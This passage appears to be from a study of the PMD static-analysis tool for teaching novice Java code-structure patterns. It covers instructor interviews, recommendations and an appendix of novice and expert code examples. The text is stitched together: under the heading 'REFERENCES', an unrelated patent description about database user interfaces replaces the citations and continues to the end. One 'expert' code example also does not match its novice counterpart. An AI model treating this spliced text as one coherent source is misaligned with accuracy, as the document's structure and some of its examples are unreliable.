One instructor reviewed the Simplify Boolean Returns pattern and remarked, “Students in all classes do this. 1410. 3500. Doesn’t matter,” and other instructors echoed this, saying that they see almost no improvement in how students structure their code after three semesters of programming instruction. This seems to imply that instructors want students to improve their use of code structure and to use expert patterns by the time they reach CS 3505, the fourth course in the series of major requirements, but students are not meeting these expectations. Given that instructors want to see students using expert patterns by CS 3505, at what point in the degree would they want to start giving instruction, feedback, and grades based on these patterns? One instructor who teaches CS 1410 and 2420 observed, “These habits, the longer you do them the harder it’s going to be to undo them,” suggesting they would prioritize addressing them for practical reasons. All instructors said that these patterns are appropriate subject matter for CS 1410.
Teaching students about these patterns and evaluating their use of them in CS 1410 comes with certain challenges. As one instructor observed, “1410 is their first semester of programming and ... they feel so triumphant just when it compiles. For you to tell them like ‘yeah, it compiles, and it works, but really you should be doing something else here…’ might be too much for them. I don't know. … But the question would be ‘Are the students comfortable enough with their own programming to really get anything out of it then?’ And I don't know the answer. I suspect some are, but some probably aren't,” suggesting that there’s uncertainty about how effective this instruction would be in CS 1410. Another instructor who also felt that code maintainability should be combined with code development from the beginning indicated that there wasn’t enough time to include it along with everything else that’s taught in CS 1410. Time came up as a limiting factor for a CS 2420 instructor as well, and despite the fact that they had previously observed that CS 2420 is not a programming class, they concluded, “… if it doesn't get cleared up in 1410 I think it's almost worthwhile to make sure it gets cleared up in 2420 and not have it persist into later classes. … maybe it's worth sacrificing not getting to cover something else.” Together, these instructors’ thoughts seem to suggest that the current curriculum is already very packed and including something new may require instructors to be willing to make tradeoffs.
Instructors want to address these code structures early in the degree because the material is appropriate to the early courses and the longer bad habits persist, the harder they are to break. Instructors of non-programming courses are willing to sacrifice instruction time in those courses to ensure that students build these skills early in the degree. Instructors are uncertain at what stage in the degree students would be ready to incorporate these concepts into their programming.
Do Instructors Perceive that Students Use These Patterns? Does It Matter to Them?
Of the patterns presented (Appendix: Instructor Interview Coding Patterns), all instructors said that they observed students using novice structure for the following patterns, and the instructors felt that this was problematic: Simplifying Boolean Returns, Repeating Code Within an If-Block and Else-Block, Splitting Out Special Cases When the General Solution is Present, and If-Statements for Exclusive Cases. All instructors observed students using novice structure for the Collapsible If Statements pattern, but one instructor felt that in some cases there are varying opinions even among experts on how to approach this pattern. All instructors observed students using novice structure for the While-Loop When a For-Loop is More Appropriate pattern, but one pointed out that this pattern could be language dependent and another observed that students tended to prefer whichever loop they learned first, which they felt was not a problem.
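For readers unfamiliar with the pattern names, the If-Statements for Exclusive Cases pattern can be illustrated with a small hypothetical example (not drawn from the study's tasks): the novice form uses independent if-statements for cases that can never hold simultaneously, while the expert form states that exclusivity with an if/else-if chain.

```java
public class ExclusiveCasesDemo
{
    // Novice structure: separate if-statements for mutually exclusive cases.
    // The reader must verify for themselves that at most one condition fires.
    public static String noviceSign(int x)
    {
        String result = "zero";
        if (x > 0) {
            result = "positive";
        }
        if (x < 0) {
            result = "negative";
        }
        return result;
    }

    // Expert structure: an if / else-if chain makes the exclusivity explicit.
    public static String expertSign(int x)
    {
        if (x > 0) {
            return "positive";
        } else if (x < 0) {
            return "negative";
        } else {
            return "zero";
        }
    }
}
```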
One instructor based their evaluation of the patterns partly on whether the novice-structured pattern produced inefficient assembly code. All instructors indicated that certain patterns, such as Simplifying Boolean Returns, were important to them because they were more likely to cause bugs and be difficult to modify. Three instructors noted that the use of certain novice patterns was important to them because it indicated to them that the code’s author had a shallow understanding of the underlying concepts. For example, repeating code within an if-block and else-block was an indication that the student did not understand which parts of the logic were actually conditional. Using if-statements for exclusive cases indicated to instructors that the student did not completely understand the enumeration and separation of the possible cases.
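The repeated-code signal the instructors describe can be made concrete with a hypothetical example (not from the study): when a statement is duplicated in both branches, only part of the logic is actually conditional, and hoisting the shared statement out makes that explicit.

```java
public class RepeatedCodeDemo
{
    // Novice structure: computing the total is repeated in both branches,
    // even though only the discount is actually conditional.
    public static double noviceTotal(double base, double tax, boolean isMember)
    {
        double total;
        if (isMember) {
            double price = base * 0.9;
            total = price + tax;
        } else {
            double price = base;
            total = price + tax;
        }
        return total;
    }

    // Expert structure: only the genuinely conditional part stays conditional;
    // the shared computation appears once.
    public static double expertTotal(double base, double tax, boolean isMember)
    {
        double price = isMember ? base * 0.9 : base;
        return price + tax;
    }
}
```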
How Do Instructors Want to Use the Instructor-Facing Tool?
While no instructors wanted to directly use the spreadsheet of raw data output by the instructor-facing PMD tool, all of them were interested in seeing it extended. Instructors had user interface extension ideas. Three instructors wanted to see the tool incorporated as an autograder where students would lose points for using novice patterns. Two were interested in seeing a graphical summary of output, such as a pie chart displaying what percentage of students used a certain pattern, or a bar graph showing the percentage of students who had multiple flags, with the intent of using the summary to choose what to emphasize in lecture. All instructors wanted to use the tool to provide students targeted, personalized feedback by automating the detection and flagging of problematic code. Instructors also had functionality-related concerns. All instructors wanted to see a verification of the robustness and correctness of the tool. Some questions they specifically wanted answered are: Does the code actually demonstrate the pattern the tool caught? Is there overlap between the tool’s patterns? Are there any known cases that give false positives? Ultimately, instructors want to use the tool to better scale grading and feedback on these code structures, either through automated grading or an improved visualization of the data, and they want an empirical understanding of the reliability of the tool.
How do Instructors Want to Use the Student-Facing Tool?
Instructors also provided input on how they would want to use the student-facing tool and how they’d want to see it improved. Some instructors wanted students to have PMD freely available as an Eclipse plug-in that runs automatically at compile-time while they’re coding their homework. Others envisioned only allowing students to run it on their code after they got their grades back, with a window of time where students could correct their flagged issues and resubmit to earn some points back.
One instructor is currently emphasizing positive feedback in their current rubrics and was interested in whether PMD could catch and flag positive things in student code, such as use of expert patterns. Another instructor was interested in whether PMD could catch use of inappropriate syntax, such as some unusual and unnecessarily complex code that was copy-pasted from Stack Overflow.
All instructors indicated that the tool needed to provide more explanation to students when a pattern is flagged. Some suggested linking to a website with additional details or showing side-by-side examples in Eclipse, while others suggested showing an embedded video or making the student take a quiz to demonstrate their understanding of the pattern. Instructors also emphasized that the phrasing of the feedback would not be clear to a student who is using these patterns in the first place, and one instructor suggested rephrasing the feedback in a way that was actionable or making it suggest to the student that they think carefully and reconsider their code structure choice. Instructors also wanted to give students a way to know they had preserved the logic of their original code if they made changes based on the tool’s feedback.
Instructors want the tool to give more comprehensive, instructive feedback to the student, including positive feedback for use of expert code structures and assurance that the code’s logic was unchanged as a result of the structure revision. Three instructors wanted students to have the tool while they coded, and one instructor wanted students to only have access to the tool after they submitted their assignment.
INTERVIEW DISCUSSION
Using the Tool to Address Scalability Issues
Current style grading and feedback processes do not scale well to large class sizes, and so instructors aren’t able to assess and target style effectively. The instructor-facing tool has the ability to provide instructors detailed insight into students’ progress and persistent or prevalent gaps in the class’s command of specific code structures. No instructors want to interface with the output of the tool the way it currently is presented, but all of them were interested in using it to get an understanding of which patterns students are struggling with so they could adapt their instruction. Incorporating a graphical user-interface (GUI) that visualizes the data the tool already outputs as a bar graph or pie chart will be an important next step, and it will be an easy improvement to make. These graphs would convey statistical information that instructors are interested in, such as the number of occurrences of each novice pattern across all assignments or the percentage of students that used a given novice pattern. Another round of feedback from instructors would be valuable once an initial prototype of the GUI is ready.
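A GUI of this kind needs per-pattern aggregate statistics behind it. The sketch below (class and method names are illustrative, not the tool's actual data model) shows the aggregation step a bar chart or pie chart would be drawn from: counting how many students were flagged at least once for each pattern and converting the counts to percentages of the class:

```java
import java.util.*;

public class PatternSummary {
    // Given per-student sets of flagged patterns, compute the percentage of
    // students flagged at least once for each pattern. The data model here is
    // an assumption for illustration, not the tool's real output format.
    public static Map<String, Double> percentFlagged(List<Set<String>> studentFlags) {
        Map<String, Integer> counts = new HashMap<>();
        for (Set<String> flags : studentFlags) {
            for (String pattern : flags) {
                counts.merge(pattern, 1, Integer::sum);
            }
        }
        Map<String, Double> percents = new TreeMap<>();
        int n = studentFlags.size();
        for (Map.Entry<String, Integer> e : counts.entrySet()) {
            percents.put(e.getKey(), 100.0 * e.getValue() / n);
        }
        return percents;
    }

    public static void main(String[] args) {
        List<Set<String>> flags = List.of(
            Set.of("SimplifyBooleanReturns", "CollapsibleIfStatements"),
            Set.of("SimplifyBooleanReturns"),
            Set.of(),
            Set.of("CollapsibleIfStatements"));
        System.out.println(percentFlagged(flags));
        // prints: {CollapsibleIfStatements=50.0, SimplifyBooleanReturns=50.0}
    }
}
```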
Another shortcoming in the current style feedback process is that there’s a delay of a week or more between students composing the code and receiving feedback. Instructors indicated that this makes it difficult to hold students accountable on the following assignments for having learned from style mistakes on previous assignments. To address this, some instructors indicated that they would want students to have access
to the student-facing tool throughout their coding process, and others indicated that they would want students to be able to use the tool to correct mistakes and earn back points on their assignment only after it had been graded for style. Withholding the student-facing tool will prevent it from masking gaps in students’ command of style, but the approach the instructor suggested would require a round of regrading. More investigation needs to be done to understand whether this visibility into students’ command of style is the only reason instructors would want to withhold the tool. If this is the only reason, perhaps other approaches, such as logging student revisions and the tool’s feedback, would provide that insight without requiring a second round of grading.
If the tool can be shown to be reliable, instructors would want to use it as part of the grading process. They said they would use it as an autograder because they believe that students will make changes to the way they code if it means they'll get more points. Instructors would also want to use it to help TAs provide students more targeted feedback. All instructors were concerned with the current logistics of having TAs give detailed feedback. They explained that asking TAs to give style feedback historically has not made much of a difference, partly because the time it takes to leave detailed feedback doesn't scale well in large classes and partly because of the variance in judgment among TAs when reading code. Extending the tool so that its output works with Gradescope's autograding and in-line comment features would be a valuable next step in making this tool meet instructors' needs.
Tool Design Recommendations
Instructors want to know if the tool is reliable before they incorporate it into their teaching, feedback, and evaluation workflow, so investigating and reporting the accuracy of the tool will be an important next step toward instructors using the tool. At this point in development, there have been cases of duplication of feedback for Collapsible If Statements; when this pattern is caught by multiple PMD rules, it is flagged multiple times, giving an inflated impression of the prevalence of this pattern (see Figures 2 and 3). Some versions of the Simplify Boolean Return and Collapsible If Statement patterns are not detected currently (see Tables 1 and 2), such as non-idiomatic use of the ternary operator, leading to false negatives. To evaluate the tool’s reliability, its output and the code it was run on need to be inspected by hand for false negatives, false positives, and duplicate feedback.
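The hand-inspection step boils down to comparing the tool's flags against ground-truth labels for the same code locations. A minimal sketch of that tally (the boolean-array representation is an assumption for illustration):

```java
public class ReliabilityCheck {
    // flagged[i]: did the tool flag location i? present[i]: does the pattern
    // actually occur there, per hand inspection? Returns {falsePositives,
    // falseNegatives}. This representation is illustrative only.
    public static int[] falsePosNeg(boolean[] flagged, boolean[] present) {
        int fp = 0, fn = 0;
        for (int i = 0; i < flagged.length; i++) {
            if (flagged[i] && !present[i]) fp++; // tool flagged, pattern absent
            if (!flagged[i] && present[i]) fn++; // pattern present, tool silent
        }
        return new int[] { fp, fn };
    }

    public static void main(String[] args) {
        boolean[] flagged = { true, true, false, false };
        boolean[] present = { true, false, true, false };
        int[] result = falsePosNeg(flagged, present);
        System.out.println(result[0] + " false positive(s), " + result[1] + " false negative(s)");
        // prints: 1 false positive(s), 1 false negative(s)
    }
}
```

Duplicate feedback would show up in such a tally as multiple flags mapping to one labeled occurrence, so a real evaluation would also need to de-duplicate flags by location before counting.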
Next Research Steps and Instructional Design Recommendations
The instructors’ perception that the Repeating Code Within an If-Block and Else-Block, Splitting Out Special Cases When the General Solution is Present, and If-Statements for Exclusive Cases patterns are entangled with the student’s understanding of the problem space and the flow of logic suggests that there’s another layer to teaching and learning about code structure that needs to be accounted for when designing the student-facing tool. Investigating this theory is an important next step because if this theory is accurate, it will mean that instructors will need to take extra steps to determine and address the root cause of the issue.
Instructors want students to learn style and maintainability starting in their very
first programming class, but instructors also expressed uncertainty about whether CS 1410 students would be “ready” to learn to integrate expert patterns effectively in their programming. Therefore, a next research step will be to investigate what practices and concepts CS 1410 and CS 2420 students learn and retain from the tool. In pursuit of that research question, the tool would need to be adapted to log the writing and revising steps the author goes through and the feedback they are presented at each step.
As stated above, instructors are unsure if students will be comfortable enough with their own programming in CS 1410 to learn from the student-facing tool. One CS 2420 instructor indicated CS 2420 isn’t a programming class, and so code structure isn’t emphasized there currently. However, that same instructor said that it’s so important to address these novice code patterns that they would consider devoting time to it in CS 2420 to make sure these problems don’t persist beyond that point. If most CS 1410 students aren’t at a point where the tool can make a measurable difference in their command of expert patterns, and there isn’t time to adequately address these patterns in CS 2420, then the curriculum needs to be adapted.
One CS 1410 instructor interviewed has recently started to incorporate weekly, TA-guided code review sessions where four students spend roughly ten minutes discussing ways to improve a provided code sample, taken from an anonymous submission to the most recent homework assignment. Research shows that pedagogical code reviews such as this in a first-semester CS course context can lead to improved student code quality, a stronger sense of community, and increasingly sophisticated discussions of programming issues and practices [4]. This process should be adopted universally in all offerings of CS 1410. The pedagogical code review designed by
Hundhausen et al. [4] was staged over the course of a semester into 3 sessions, each 170 minutes long with 21 participants. This model may be too resource-intensive and may need to be adapted to fit the context of CS 1410, which already has a demanding, weekly lab component. The rules used by PMD can be incorporated into the checklist of best practices that students use to examine each other's code. Introducing first- or second-semester students to code patterns and style in this guided and structured way lays a strong foundation that can then be expanded on in CS 2420.
Rather than removing material from CS 2420 and replacing it with these topics, a one credit-hour co-requisite for CS 2420 should be introduced. Skills and topics covered and practiced in this class would then be reinforced by grading and feedback in CS 2420. One implementation of this kind of class [15] found that the quality control of the feedback given to students and the cost of running the course was a concern when transitioning to a larger scale (100 students). PMD could be extended to address this concern, improving the student experience and easing the burden on instructors.
Programming exercises specifically targeting the relevant code structures would need to be developed, and the tool would need to be able to track and report student progress. These would be substantial tasks. The student-facing tool doesn’t currently record any data, such as error messages, file snapshots, or keystrokes between runs.
COMBINED DISCUSSION
Tool and Instructional Design Recommendations
When students wrote code that used expert patterns during the think-alouds, PMD gave no feedback, and this was confusing to students. One instructor indicated that they want students to receive specific, positive feedback on things they did well in their assignments. Extending PMD so that it flags expert patterns and provides positive feedback on them would help address this usability issue students encountered, it would help students recognize when they’ve used expert structure, and it would provide a feature that an instructor wants.
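PMD matches patterns on the parsed AST, so the sketch below is not how a real PMD rule would be written; it only illustrates, with a naive textual check, what "flagging an expert pattern" means for the expert form of Simplify Boolean Returns (a return whose expression is the comparison itself):

```java
import java.util.regex.Pattern;

public class ExpertPatternSpotter {
    // Naive textual check for a `return` whose expression is a comparison,
    // i.e. the expert form of the Simplify Boolean Returns pattern.
    // Excluding '?' keeps the novice ternary form from matching.
    // A real rule would walk the AST instead of matching source text.
    private static final Pattern DIRECT_BOOLEAN_RETURN =
        Pattern.compile("return\\s+[^;?]*(==|!=|<=|>=|<|>)[^;?]*;");

    public static boolean usesExpertReturn(String source) {
        return DIRECT_BOOLEAN_RETURN.matcher(source).find();
    }
}
```

On the appendix examples, this check accepts `return i == 1;` but rejects both the if/else novice version and `return i == 1 ? true : false;`, which is the distinction positive feedback would need to make.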
When PMD flagged novice patterns during the think-aloud, students did not consistently interpret the feedback correctly. All instructors expressed concern that the current PMD feedback is insufficient for teaching students why and how they should use expert patterns. For example, they felt that highlighting an instance of the Simplify Boolean Returns pattern in the student's code and telling them to "Avoid unnecessary if..then..else statements," would not effectively convey a motivation or explanation for coding a different way, especially to someone who is using that pattern in the first place. Three of the four instructors also expressed concerns that the feedback was not worded in an actionable way. PMD's feedback needs to be revised to be more actionable and to provide information that would be significant and useful to a student who is learning how and why to use these patterns.
When revising their code for style, all students but one were clearly aware of the correctness implications of their revisions and did not blindly copy and paste code. Still, most students expressed uncertainty about whether their revision did the same thing as their original code. One instructor pointed out that when students come for help with their code, and their code is needlessly complex and difficult to understand and change, the students are extremely averse to suggestions to modify their code to improve its readability or maintainability. The instructor theorized that this is because the students had already put so much work into the code that they didn’t want to spend time fixing something that (probably) wasn’t broken and risk introducing new problems. Extending the tool so it could determine and convey whether the student’s change preserved the original logic would help address this resistance and hesitancy. This extension would be difficult. Deciding when this feature runs and incorporating its functionality into the existing tool logic is one concern, but in addition to this, determining the semantics of a piece of code at compile time is difficult (more difficult for some patterns than others).
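Full semantic equivalence checking is undecidable in general, but for the small, pure methods these patterns involve, the tool could at least spot-check that a revision behaves identically by running both versions over a range of inputs. A minimal sketch of that idea (the functional-interface framing is an assumption, not part of the tool):

```java
import java.util.function.IntPredicate;

public class RevisionCheck {
    // Spot-check that a revised method agrees with the original over a range
    // of inputs. Not a proof of equivalence, just evidence the logic survived.
    public static boolean agreeOnRange(IntPredicate original, IntPredicate revised,
                                       int lo, int hi) {
        for (int i = lo; i <= hi; i++) {
            if (original.test(i) != revised.test(i)) return false;
        }
        return true;
    }

    public static void main(String[] args) {
        // Novice and expert forms of isStrictlyPositive from the think-aloud tasks.
        IntPredicate novice = i -> { if (i > 0) { return true; } else { return false; } };
        IntPredicate expert = i -> i > 0;
        System.out.println(agreeOnRange(novice, expert, -1000, 1000)); // prints true
    }
}
```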
Next Research Steps
Students’ word choices while thinking out loud raised questions about how best to phrase the tool’s feedback. While completing the isStrictlyPositive task, Participant 4 used the term “statement” correctly at times (e.g. “make it a single line statement”) and incorrectly at other times (e.g. “for a return type where they actually make it a Boolean statement itself”). This is interesting because it suggests either the student knows the correct terms (and just is using the wrong terms by mistake or by lack of attention to detail) or the student has an incorrect understanding of the difference
between a statement and an expression. This distinction will affect the wording of the PMD feedback. This student misinterpreted the current feedback, but would they know what to do if it instead said something like, “Return the Boolean expression directly”? Or would that lead to more confusion if they're not confident about what an expression is?
When investigating the effectiveness of error messaging in DrRacket, Marceau et al. [8] noted from interviews with students that:
"[S]tudents misused words, or used long and inaccurate phrases instead of using the precise technical terms when describing code," and "…some exchanges during the interview suggested that the students’ poor command of the vocabulary undermined their ability to respond to the messages" (Marceau et al., 2011, p. 3).
Understanding how this finding applies to student interactions with PMD also ties in with instructor concerns about which course in the degree would be most appropriate for students to use the tool. The level of vocabulary used in the tool's feedback needs to match the level of vocabulary that the student has learned.
Another dimension of the feedback is its intent. All instructors interviewed want the PMD feedback to be more actionable. However, Marceau et al. [8] specifically recommended against error messages that propose a solution in the case where the suggested fix might not cover all cases. Testing whether or not actionable feedback from PMD can always be applied to the flagged code needs to be included as part of investigating the reliability of the tool and refining the phrasing of the feedback.
CONCLUSION
PMD flagged the code structures it was expected to, and students had some success at interpreting its feedback and revising their code structures. PMD’s feedback still needs reworking to better facilitate learning. Instructors want to incorporate the student-facing tool and batch-processing tool in their workflow, but they want more detailed information about the tool's reliability and the output of the instructor-facing tool needs to be made user-friendly.
APPENDIX: THINK-ALOUD TASKS
```java
/*
* This method takes in an int and returns a boolean.
* Returns true if the following condition is met:
* the input is positive
* Returns false if either of the following conditions are met:
* the input is 0
* the input is negative
*/
public static boolean isStrictlyPositive(int input) {
}
/*
* This method takes in 2 ints and returns a String;
* Returns "Ok" when the input meets BOTH of these conditions:
* numTop divided by numBot is greater than or equal to 7
* numTop times numBot is greater than or equal to 128
* Otherwise, returns "Not Ok"
*/
public static String okNotOk(int numTop, int numBot) {
}
```
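For reference, one expert-style completion of each stub (these are illustrative answers, not part of the original task sheet; note the task statement does not say how okNotOk should treat numBot == 0):

```java
public class ThinkAloudSolutions {
    // Expert form of the first task: return the comparison directly.
    public static boolean isStrictlyPositive(int input) {
        return input > 0;
    }

    // Expert form of the second task: one combined condition, no repeated branches.
    public static String okNotOk(int numTop, int numBot) {
        return (numTop / numBot >= 7 && numTop * numBot >= 128) ? "Ok" : "Not Ok";
    }
}
```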
**Simplify Boolean Returns Pattern**
**Novice Version 1**
```java
if (i == 1) {
    return true;
} else {
    return false;
}
```
**Novice Version 2**
```java
boolean isNull = false;
if (head == null) {
    isNull = true;
}
```
**Novice Version 3**
```java
boolean b;
if (i == 1) {
    b = true;
} else {
    b = false;
}
return b;
```
**Novice Version 4**
```java
return i == 1 ? true : false;
```
**Expert Version**
```java
return i == 1;
```
**Collapsible If Statements Pattern**
**Novice Version 1**
```java
if (num != 0) {
    if (num != 1) {
        return "Ok";
    }
    return "Not Ok";
}
return "Not Ok";
```
**Novice Version 2**
```java
if (min < num) {
    return max > 1;
}
return false;
```
**Novice Version 3**
```java
if (min == 0) {
    return "Not Ok";
}
if (max/min > 0) {
    return "Ok";
}
return "Not Ok";
```
**Expert Version 1**
```java
return min < num && max > 1;
```
**Expert Version 2**
```java
if (min != 0 && max/min > 0) {
return "Ok";
}
return "Not Ok";
```
**While Loop Should Be For Loop Pattern**
**Novice Version 1**
```java
int i = 2;
while (i < array.length) {
array[i] = array[i] + 2;
i++;
}
return array;
```
**Expert Version**
```java
for (int i = 2; i < array.length; i++) {
array[i] = array[i] + 2;
}
return array;
```
**Repeating Code Within an If-block and Else-block Pattern**
**Novice Version 1**
```java
String name;
double price;
double discountPrice;
double over50Discount = .2;
double discount = .1;
if (price > 50) {
    discountPrice = price * (1 - over50Discount);
    return "The original price of " + name + " was $" + price + " but you get a discount of " + over50Discount + " so you only pay $" + discountPrice;
} else {
    discountPrice = price * (1 - discount);
    return "The original price of " + name + " was $" + price + " but you get a discount of " + discount + " so you only pay $" + discountPrice;
}
```
**Expert Version**
```java
double sale = 0.25;
double specialSale = 0.5;
double over50Sale = 0.35;
double actualSale = 0;
String beginning = "Your item, " + item + ", usually costs " + price + ", but ";
String ending = "you are getting it for ";
if (item.equals("socks") && coupon) {
    beginning += "since you have a coupon, ";
    actualSale = specialSale;
} else if (price > 50) {
    beginning += "since it is over 50, ";
    actualSale = over50Sale;
} else {
    actualSale = sale;
}
String realEnding = "Congratulations!! you saved ";
double savings = price - price * (1 - actualSale);
realEnding += savings + ";";
return beginning + ending + price * (1 - actualSale) + realEnding;
```
**Splitting out a Special Case When the General Solution is Present Pattern**
**Novice Version 1**
```java
if (first.length() != second.length()) {
    return first + " and " + second + " do not have the same letters.";
}
char letters1[] = first.toCharArray();
char letters2[] = second.toCharArray();
Arrays.sort(letters1);
Arrays.sort(letters2);
if (Arrays.equals(letters1, letters2)) {
    return first + " has the same letters as " + second;
}
return first + " and " + second + " do not have the same letters.";
```
**Expert Version**
```java
char letters1[] = first.toCharArray();
char letters2[] = second.toCharArray();
Arrays.sort(letters1);
Arrays.sort(letters2);
if (Arrays.equals(letters1, letters2)) {
    return first + " has the same letters as " + second;
}
return first + " and " + second + " do not have the same letters.";
```
**If-Statements for Exclusive Cases (Rather Than If-Else) Pattern**
**Novice Version 1**
```java
String size = "";
if (i < 10) {
    size = "small";
}
if (i >= 10 && i < 20) {
    size = "medium";
}
if (i >= 20) {
    size = "big";
}
return "The size is " + size;
```
**Expert Version**
```java
String size = "";
if (i < 10) {
    size = "small";
} else if (i >= 10 && i < 20) {
    size = "medium";
} else {
    size = "big";
}
return "The size is " + size;
```
REFERENCES
Methods and systems for creating a complex user interface adapting a generic database software application to individually manage subset domains in complex database
The method also comprises data package specification for the data subset domain, specifying a data package hierarchy within the data subset domain, specifying user groups for the data subset domain, specifying view specifications for the user groups. Further the view specification is associated with the task specification and the report specification after which the generic software application is released to a user.
Description
TECHNICAL FIELD
[0001] The present invention generally relates to database management, and more particularly relates to a knowledge management system (KMS) for specifying a subset of entity types, data relationships and attributes from the full data model that are visible to a user in a context defined by a specific use objective.
BACKGROUND
[0002] A database (DB) is an organized collection of data for one or more purposes, usually in digital form. The data are typically organized to model relevant aspects of reality (for example, the availability of seats on an aircraft), in a way that supports processes requiring this information (for example, finding an aircraft with seats available). This definition is very general, and is independent of the type of technology used.
[0003] The term "database" may be narrowed to specify particular aspects of the organized collection of data and may refer to the logical database, to the physical database as data content in computer data storage, or to many other database sub-definitions. The term database is correctly applied to the data and their supporting data structures, and not to an associated database management system (DBMS). The database data collection together with a DBMS is referred to herein as a database system.
[0004] A knowledge management system ("KMS") is an application that is built on top of a DBMS and manipulates data within the structure of a DBMS. While a DBMS contains facts, a KMS adds rules and relationships to those facts to convert the facts into a model that can be used by software to automatically make further inferences and decisions.
[0005] The term database system implies that the collection of data is managed to some level of quality (measured in terms of accuracy, availability, usability, and resilience) and this in turn often implies the use of a general purpose database management system (DBMS). A general purpose DBMS is typically a complex software system that meets many usage requirements, and the databases that it maintains are often large and complex. The utilization of databases is now spread to such a wide degree that virtually every technology and product relies on databases and DBMSs for its development and commercialization, or even may have such embedded in it. Well known exemplary DBMSs include Oracle, IBM DB2, Microsoft SQL Server, PostgreSQL, MySQL and SQLite. A DBMS also needs to provide effective run-time execution to properly support (e.g., in terms of performance, availability, and security) as many end-users as needed.
[0006] The design, construction, and maintenance of a complex database has historically required the skills of a specialist, whose tasks are supported by specialized computer tools provided either as part of the DBMS or as stand-alone software products. These tools include specialized database languages including data definition languages (DDL), data manipulation languages (DML), and query languages. These can be seen as special-purpose programming languages, tailored specifically to manipulate databases; sometimes they are provided as extensions of existing programming languages, with added database commands. The most widely supported database language is SQL, which has been developed for the relational data model and combines the roles of DDL, DML, and a query language.
[0007] However, the common every day user is not a skilled database programmer. Often times the user is left to his own devices to use standard one-size-fits-all query tools and data presentations. Although data presentations are known that sort results by subject relevancy, those data presentations are typically rendered as a list of documents pages long with mere summary lines attempting to describe the data contained in each. Hence, there is a need for methods to alleviate the need for special programming skills to efficiently retrieve desired data from large complex databases and to provide the most useful display of the requested information.
BRIEF SUMMARY
[0008] A computer executed method is provided for creating a complex graphical user interface on a display device via generic computer readable database software that is executable on a processor to manage only a specific data subset domain of the application data in a database. The method comprises creating metadata defining a data subset domain, the metadata including a Task Specification, a Report Specification and a View Specification, and defining Attribute metadata, Entity metadata and Relationship metadata for the data subset domain. The method further comprises specifying a Data Package Specification for the data subset domain, a Data Package hierarchy within the data subset domain, a user group for the data subset domain, and a View Specification for the user group, and associating the View Specification with the Task Specification and the Report Specification. The generic software application is then released to a user.
[0009] A computer program product is provided on a non-transitory storage medium comprising steps for creating a complex graphical user interface on a display device via generic computer readable database software to manage only a specific data subset domain of application data in a database. The steps comprise creating metadata defining a data subset domain, the metadata including a Task Specification, a Report Specification and a View Specification, and defining Attribute metadata, Entity metadata and Relationship metadata for the data subset domain. The steps further comprise specifying a Data Package Specification for the data subset domain, a Data Package hierarchy within the data subset domain, a user group for the data subset domain, and a View Specification for the user group, and associating the View Specification with the Task Specification and the Report Specification. The generic software application is then released to a user.
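As a purely illustrative sketch (the patent does not prescribe any concrete types; the names are taken from the summary above and the structure is assumed), the metadata hierarchy described in [0008] might be modeled as:

```java
import java.util.List;

// Illustrative-only data model for the metadata described above; the
// specification does not define these types or fields.
public class SubsetDomainMetadata {
    public record TaskSpecification(String name) {}
    public record ReportSpecification(String name) {}
    // A View Specification is associated with a Task Specification
    // and a Report Specification, as in paragraph [0008].
    public record ViewSpecification(String name, TaskSpecification task,
                                    ReportSpecification report) {}

    public record DataSubsetDomain(String name,
                                   List<String> entityTypes,    // Entity metadata
                                   List<String> attributes,     // Attribute metadata
                                   List<String> relationships,  // Relationship metadata
                                   List<ViewSpecification> views) {}

    public static void main(String[] args) {
        // Example domain based on the aircraft-seats illustration in [0002].
        var task = new TaskSpecification("find-available-seats");
        var report = new ReportSpecification("seat-availability");
        var view = new ViewSpecification("agent-view", task, report);
        var domain = new DataSubsetDomain("flights",
                List.of("Aircraft", "Seat"), List.of("seatNumber"),
                List.of("Aircraft-has-Seat"), List.of(view));
        System.out.println(domain.views().get(0).name()); // prints agent-view
    }
}
```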
[0010] Furthermore, other desirable features and characteristics of the [system/method] will become apparent from the subsequent detailed description and the appended claims, taken in conjunction with the accompanying drawings and the preceding background.
BRIEF DESCRIPTION OF THE DRAWINGS
[0011] The present invention will hereinafter be described in conjunction with the following drawing figures, wherein like numerals denote like elements, and wherein:
FIG. 1 is a simplified block diagram of a database system;
FIG. 2 is a conceptual organizational chart of the various schema implementing the complex user interface;
FIG. 3 is a conceptual process chart for converting raw application data into user specific Data Packages;
FIG. 4 is a flow chart of an exemplary method to create the complex user interface;
FIG. 5 is an exemplary conceptual rendition of a Data Package;
FIG. 6 is an exemplary graphical User Interface (GUI) that may be used to create a VIEWSpec;
FIG. 7 is an exemplary logic flow diagram of a method of using a VIEWSpec; and
FIG. 8 is an exemplary display generated by a VIEWSpec.
DETAILED DESCRIPTION
[0012] The following detailed description is merely exemplary in nature and is not intended to limit the invention or the application and uses of the invention. As used herein, the word "exemplary" means "serving as an example, instance, or illustration." Thus, any embodiment described herein as "exemplary" is not necessarily to be construed as preferred or advantageous over other embodiments. All of the embodiments described herein are exemplary embodiments provided to enable persons skilled in the art to make or use the invention and not to limit the scope of the invention which is defined by the claims. Furthermore, there is no intention to be bound by any expressed or implied theory presented in the preceding technical field, background, brief summary, or the following detailed description.
[0013] Those of skill in the art will appreciate that the various illustrative logical blocks, modules, and algorithm steps described in connection with the embodiments disclosed herein may be implemented as electronic hardware, firmware or computer software executing on a computing device, or combinations thereof. Some of the embodiments and implementations are described above in terms of functional and/or logical block components (or modules) and various processing steps. However, it should be appreciated that such block components (or modules) may be realized by any number of hardware, executable software, and/or firmware components configured to perform the specified functions. To clearly illustrate this interchangeability of hardware and software, various illustrative components, blocks, modules, circuits, and steps have been described above generally in terms of their functionality. Whether such functionality is implemented as hardware or software depends upon the particular application and design constraints imposed on the overall system. Skilled artisans may implement the described functionality in varying ways for each particular application, but such implementation decisions should not be interpreted as causing a departure from the scope of the present invention. For example, an embodiment of a system or a component may employ various integrated circuit components, e.g., memory elements, digital signal processing elements, logic elements, look-up tables, or the like, which may carry out a variety of functions under the control of one or more microprocessors or other control devices. In addition, those skilled in the art will appreciate that embodiments described herein are merely exemplary implementations.
[0014] The various illustrative logical blocks, modules, and circuits described in connection with the embodiments disclosed herein may be implemented or performed with a general purpose processor, a digital signal processor (DSP), an application specific integrated circuit (ASIC), a field programmable gate array (FPGA) or other programmable logic device, discrete gate or transistor logic, discrete hardware components, or any combination thereof designed to perform the functions described herein. A general-purpose processor may be a microprocessor, but in the alternative, the processor may be any conventional processor, controller, microcontroller, or state machine. A processor may also be implemented as a combination of computing devices, e.g., a combination of a DSP and a microprocessor, a plurality of microprocessors, one or more microprocessors in conjunction with a DSP core, or any other such configuration.
